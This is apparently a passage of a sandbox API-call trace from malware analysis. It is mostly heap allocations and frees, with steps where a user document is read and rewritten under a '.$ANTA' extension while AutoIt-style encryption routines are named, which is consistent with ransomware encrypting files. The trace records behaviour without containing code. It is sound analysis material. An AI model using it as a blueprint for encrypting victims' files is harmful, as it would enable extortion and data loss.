HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cd0 | out: hHeap=0x1780000) returned 1 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391a80 | out: hHeap=0x1780000) returned 1 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.338] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cc0 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb498 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0083.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x90) returned 0x4050fa8 [0083.339] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd")) returned 0x10 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4050fa8 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4051040 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb1c8 | out: hHeap=0x1780000) returned 1 [0083.339] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b30 | out: hHeap=0x1780000) returned 1 [0083.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac500 [0083.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0083.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb1c8 [0083.339] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cc0 [0083.339] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Documents\\D2Y3tG\\kc_ drhegB\\WZ9w\\-HpKoiMRyoVVCXApKjWd\\zSm3MoFqp.odp.$ANTA" (normalized: "c:\\users\\fd1hvy\\documents\\d2y3tg\\kc_ drhegb\\wz9w\\-hpkoimryovvcxapkjwd\\zsm3mofqp.odp.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x298 [0083.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfef0 [0083.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3d8 [0083.340] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b30 [0083.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cffe0 | out: hHeap=0x1780000) returned 1 [0083.340] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.341] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797108 [0083.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cf0 | out: hHeap=0x1780000) returned 1 [0083.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0083.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c30 | out: hHeap=0x1780000) returned 1 [0083.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0083.341] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac780 | out: hHeap=0x1780000) returned 1 [0083.341] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac780 [0083.341] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0083.341] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c60 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0083.341] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0083.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0083.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.342] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c60 | out: hHeap=0x1780000) returned 1 [0083.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0083.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c50 [0083.342] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e00020 [0083.387] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144e5a0 | out: lpNewFilePointer=0x0) returned 1 [0083.388] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0xb865, lpOverlapped=0x0) returned 1 [0083.390] ReadFile (in: hFile=0x258, lpBuffer=0x43ed3b0, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144e5c8, lpOverlapped=0x0 | out: lpBuffer=0x43ed3b0*, lpNumberOfBytesRead=0x144e5c8*=0x0, lpOverlapped=0x0) returned 1 [0083.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb3a8 | out: hHeap=0x1780000) returned 1 [0083.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.390] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb180 | out: hHeap=0x1780000) returned 1 [0083.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ba0 [0083.390] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb865) returned 0x43fd3b8 [0083.392] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e00020 | out: hHeap=0x1780000) returned 1 [0083.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb150 | out: hHeap=0x1780000) returned 1 [0083.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0058 | out: hHeap=0x1780000) returned 1 [0083.395] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d10 [0083.395] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb865) returned 0x49aa010 [0083.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd3b8 | out: hHeap=0x1780000) returned 1 [0083.396] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ba0 | out: hHeap=0x1780000) returned 1 [0083.396] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 1 [0083.397] TranslateMessage (lpMsg=0x144e97c) returned 0 [0083.397] DispatchMessageW (lpMsg=0x144e97c) returned 0x0 [0083.397] KillTimer (hWnd=0x502d2, uIDEvent=0x1) returned 1 [0083.397] SetTimer (hWnd=0x502d2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0083.397] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0083.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0083.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0083.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c50 [0083.397] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb865) returned 0x43fd3b8 [0083.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43fd3b8 | out: hHeap=0x1780000) returned 1 [0083.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c50 | out: hHeap=0x1780000) returned 1 [0083.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb138 | out: hHeap=0x1780000) returned 1 [0083.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0238 | out: hHeap=0x1780000) returned 1 [0083.397] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.398] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1797128 [0083.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797128 | out: hHeap=0x1780000) returned 1 [0083.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac040 [0083.398] PeekMessageW (in: lpMsg=0x144e97c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e97c) returned 0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c80 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4391d90 [0083.398] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0083.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4391d90 | out: hHeap=0x1780000) returned 1 [0083.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff90 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c50 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0238 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb138 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2bf0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cf0 [0083.398] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb865) returned 0x43fd3b8 [0083.398] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2bf0 | out: hHeap=0x1780000) returned 1 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2ba0 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb150 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b40 [0083.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c60 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb180 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2c20 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb438 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2cb0 [0083.399] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2cb0 | out: hHeap=0x1780000) returned 1 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb420 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cffe0 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3c0 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bf0 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb498 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c30 [0083.399] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xb865) returned 0x49b5880 [0083.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0198 [0083.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cb0 [0083.400] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0083.400] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0170 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb450 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0058 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb468 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b80 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb390 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0120 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3a8 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2bb0 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb3f0 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a9218 [0083.401] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0083.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b60 | out: hHeap=0x1780000) returned 1 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c70 [0083.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c70 | out: hHeap=0x1780000) returned 1 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac7c0 [0083.401] PeekMessageW (in: lpMsg=0x144e44c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144e44c) returned 0 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0148 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c70 [0083.401] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb408 | out: hHeap=0x1780000) returned 1 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cff18 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb408 [0083.401] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb480 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2b60 [0083.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cb480 | out: hHeap=0x1780000) returned 1 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0083.402] CharUpperBuffW (in: lpsz="__CRYPT_GETCALGFROMCRYPTKEY", cchLength=0x1b | out: lpsz="__CRYPT_GETCALGFROMCRYPTKEY") returned 0x1b [0083.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8b58 | out: hHeap=0x1780000) returned 1 [0083.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b40 | out: hHeap=0x1780000) returned 1 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d00d0 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2bc0 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d01c0 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43cb4b0 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2c00 [0083.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2c00 | out: hHeap=0x1780000) returned 1 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0xc) returned 0x43cb480 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0080 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c00 [0083.402] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3758 | out: hHeap=0x1780000) returned 1 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfd60 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3848 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8b58 [0083.402] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.402] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfdb0 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3698 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2cd0 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3650 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3818 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2ce0 [0083.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3818 | out: hHeap=0x1780000) returned 1 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d0530 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3590 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2d00 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3770 [0083.403] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x14) returned 0x1797048 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d00 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3638 [0083.403] CharLowerBuffW (in: lpsz="uint", cchLength=0x4 | out: lpsz="uint") returned 0x4 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x24) returned 0x17e2728 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36b0 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b40 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3740 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3680 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b50 [0083.403] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c36f8 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2b70 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c36f8 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b70 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3680 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2b50 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3740 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d20 | out: hHeap=0x1780000) returned 1 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2c10 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2d20 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3638 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2d00 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3770 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c3590 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43d0530 | out: hHeap=0x1780000) returned 1 [0083.404] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2ce0 | out: hHeap=0x1780000) returned 1 [0083.404] PeekMessageW (in: lpMsg=0x144df34, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144df34) returned 0 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43d03c8 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3758 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2ce0 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c37d0 [0083.404] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c3620 